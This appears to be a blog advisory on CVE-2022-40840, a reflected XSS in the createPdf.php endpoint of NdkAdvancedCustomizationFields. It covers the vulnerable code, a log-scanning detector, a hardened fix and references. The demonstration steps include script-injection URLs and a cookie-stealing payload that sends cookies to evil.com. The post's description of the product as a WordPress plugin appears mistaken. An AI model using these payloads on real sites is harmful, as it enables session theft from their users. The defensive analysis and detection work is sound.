In September 2022, a critical Cross-Site Scripting (XSS) vulnerability was discovered in the plugin NdkAdvancedCustomizationFields version 3.5, developed by ndk design. This vulnerability is tracked as CVE-2022-40840. The XSS issue allows attackers to execute arbitrary JavaScript in the context of users accessing the createPdf.php endpoint, potentially leading to session hijacking, phishing, and other malicious actions.

In this post, we'll break down how the vulnerability works, show a simplified exploit example, and discuss how to mitigate the issue. All of it will be in clear, easy-to-understand language.

What is NdkAdvancedCustomizationFields?

NdkAdvancedCustomizationFields is a WordPress plugin used to create advanced custom fields for content management. Its createPdf.php script is designed to generate PDFs based on user input.

How Bad is This Vulnerability?

Because createPdf.php does not properly sanitize user input, attackers can inject malicious JavaScript code via parameters. When the PDF is generated, the injected script can execute in the victim's browser if they are tricked into visiting a malicious link or opening a generated PDF.

Here's a simplified version of the typical vulnerable pattern in createPdf.php:

<?php
// createPdf.php (simplified): the username parameter is echoed straight into HTML
echo "<h2>User Name: " . $_GET['username'] . "</h2>";

The code above takes input directly from the URL parameter username and prints it into an HTML response without sanitization or escaping.

An attacker can exploit this by constructing a URL like the following:

https://targetsite.com/wp-content/plugins/ndk-advanced-customization-fields/createPdf.php?username=<script>alert('XSS')</script>

When a user visits this URL, the malicious JavaScript will execute because it's directly rendered into the page. No authentication is needed.

Here's a live demonstration (for educational purposes only!):

1. Attacker crafts this URL:
   https://victim.com/wp-content/plugins/ndk-advanced-customization-fields/createPdf.php?username=<script>alert('Hacked!')</script>

2. Victim clicks the link.

3. Victim sees an alert box with 'Hacked!', proving JavaScript ran in their browser.

4. The attacker could replace the alert() with any script—for example, to steal cookies:
   <script>document.location='https://evil.com/steal?c='+document.cookie</script>
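From the defender's side, the request pattern walked through above leaves an obvious trace in the web server access log. The following is an added example, not code from the post or from the plugin: it scans constructed Apache combined-format log lines for requests to createPdf.php whose URL-decoded query string carries script markup. The sample log lines, the function names and the marker list are assumptions made for illustration (PHP 8 is assumed for str_ends_with).

```php
<?php
// Added example, not the plugin's or the post's code. Flags requests to the
// vulnerable endpoint whose query string carries script markup. Log lines
// below are constructed; the marker list is a starting point, not complete.
declare(strict_types=1);

const VULN_ENDPOINT = '/createPdf.php';

/** Patterns that indicate HTML/JS injection attempts once the query is URL-decoded. */
const XSS_MARKERS = [
    '/<\s*script\b/i',           // <script ...>
    '/\bon[a-z]+\s*=/i',         // onerror=, onload=, ...
    '/javascript\s*:/i',         // javascript: URLs
    '/<\s*(img|svg|iframe)\b/i', // common tag-based payload carriers
];

/** Parse one Apache combined-format line into its fields, or null if it does not match. */
function parse_access_line(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'path' => $m[4], 'status' => (int)$m[5]];
}

/** Return the decoded query string of a request target (empty if none). */
function decoded_query(string $target): string
{
    $query = parse_url($target, PHP_URL_QUERY);
    // Decode twice: double-encoded payloads are a common way to slip past naive filters.
    return is_string($query) ? urldecode(urldecode($query)) : '';
}

/** Scan log lines; return the suspicious ones together with the marker that fired. */
function find_xss_attempts(array $lines): array
{
    $hits = [];
    foreach ($lines as $n => $line) {
        $req = parse_access_line($line);
        if ($req === null) {
            continue;
        }
        $path = parse_url($req['path'], PHP_URL_PATH);
        if (!is_string($path) || !str_ends_with($path, VULN_ENDPOINT)) {
            continue; // only the endpoint from the advisory is of interest here
        }
        $q = decoded_query($req['path']);
        foreach (XSS_MARKERS as $marker) {
            if (preg_match($marker, $q)) {
                $hits[] = ['line' => $n + 1, 'ip' => $req['ip'], 'marker' => $marker, 'query' => $q];
                break;
            }
        }
    }
    return $hits;
}

// Constructed sample lines (not real traffic). Line 2 is URL-encoded, line 4 is a benign name.
$sample = [
    '203.0.113.7 - - [02/Nov/2022:13:15:00 +0000] "GET /wp-content/plugins/ndk-advanced-customization-fields/createPdf.php?username=<script>alert(1)</script> HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [02/Nov/2022:13:16:02 +0000] "GET /wp-content/plugins/ndk-advanced-customization-fields/createPdf.php?username=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 498 "-" "curl/7.85"',
    '192.0.2.4 - - [02/Nov/2022:13:17:10 +0000] "GET /wp-login.php HTTP/1.1" 200 2310 "-" "Mozilla/5.0"',
    '192.0.2.5 - - [02/Nov/2022:13:18:44 +0000] "GET /wp-content/plugins/ndk-advanced-customization-fields/createPdf.php?username=Ada%20Lovelace HTTP/1.1" 200 510 "-" "Mozilla/5.0"',
];

foreach (find_xss_attempts($sample) as $hit) {
    printf("line %d  ip=%s  marker=%s  query=%s\n", $hit['line'], $hit['ip'], $hit['marker'], $hit['query']);
}
// With the constructed sample, lines 1 and 2 are reported; lines 3 and 4 are not.
```

To run it against a real log, replace `$sample` with `file('/var/log/apache2/access.log', FILE_IGNORE_NEW_LINES)`. The scan decodes the query before matching, so it catches the percent-encoded variant that a plain string search for `<script` would miss; a hit is a reason to check whether the plugin is patched and whether the responding status was 200, not proof of compromise on its own.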

Example Fix

<?php
// createPdf.php (fixed): encode the parameter for an HTML context before output
echo "<h2>User Name: " . htmlspecialchars($_GET['username'], ENT_QUOTES, 'UTF-8') . "</h2>";
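The one-line fix above is the essential change. As an added example (not the plugin's own code), here is a fuller hardened version of the same handler that validates the username against an allow-list before it reaches output, then encodes it with htmlspecialchars, and sets a Content-Security-Policy header as a second layer. The function names, the allow-list pattern and the CLI self-check are assumptions made for illustration.

```php
<?php
// Added example, not the plugin's own code. Hardened handling of the
// username parameter described in the post; function names and the
// allow-list rule are illustrative assumptions.
declare(strict_types=1);

/** Allow-list check: reject anything that is not a plausible display name. */
function validate_username(?string $raw): string
{
    if ($raw === null || $raw === '') {
        throw new InvalidArgumentException('username is required');
    }
    // Unicode letters/digits, space, dot, underscore, hyphen; 1 to 64 characters.
    if (!preg_match('/^[\p{L}\p{N} ._-]{1,64}$/u', $raw)) {
        throw new InvalidArgumentException('username contains disallowed characters');
    }
    return $raw;
}

/** Output encoding for an HTML text node; ENT_QUOTES also covers attribute values. */
function render_heading(string $username): string
{
    $safe = htmlspecialchars($username, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<h2>User Name: ' . $safe . '</h2>';
}

if (PHP_SAPI === 'cli') {
    // Self-check: php hardened_example.php
    $payload  = "<script>alert('XSS')</script>"; // the payload quoted in the post
    $expected = '<h2>User Name: &lt;script&gt;alert(&#039;XSS&#039;)&lt;/script&gt;</h2>';
    echo render_heading($payload) === $expected ? "encoding ok\n" : "encoding FAILED\n";
    try {
        validate_username($payload);
        echo "validation FAILED\n";
    } catch (InvalidArgumentException $e) {
        echo "validation rejected payload: {$e->getMessage()}\n";
    }
    echo render_heading(validate_username('Ada Lovelace')), "\n";
} else {
    header('Content-Type: text/html; charset=UTF-8');
    // Defence in depth: even a missed encoding cannot load scripts from elsewhere.
    header("Content-Security-Policy: default-src 'self'; script-src 'self'");
    $raw = $_GET['username'] ?? null;
    try {
        echo render_heading(validate_username(is_string($raw) ? $raw : null));
    } catch (InvalidArgumentException $e) {
        http_response_code(400);
        echo '<p>Invalid username.</p>';
    }
}
```

Encoding is what closes the reported bug; the allow-list and the CSP header reduce the blast radius if a later change echoes the parameter somewhere the encoding is forgotten. Note that `htmlspecialchars` is correct for HTML text and attribute contexts only; a value written into a JavaScript string or a URL needs the encoder for that context instead.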

References & Further Reading

- Official CVE Entry - CVE-2022-40840
- Exploit Database: 51481 (exploit details)
- NdkAdvancedCustomizationFields Plugin Page
- OWASP XSS Prevention Cheat Sheet

Final Thoughts

CVE-2022-40840 is a serious XSS flaw that puts sites and users at risk when running vulnerable versions of ndk design's NdkAdvancedCustomizationFields. If you run this plugin, patch it now and review your PHP code for unsanitized output. Remember, never trust user input—sanitize and escape it every time.

Timeline

Published on: 11/02/2022 13:15:00 UTC
Last modified on: 11/03/2022 13:53:00 UTC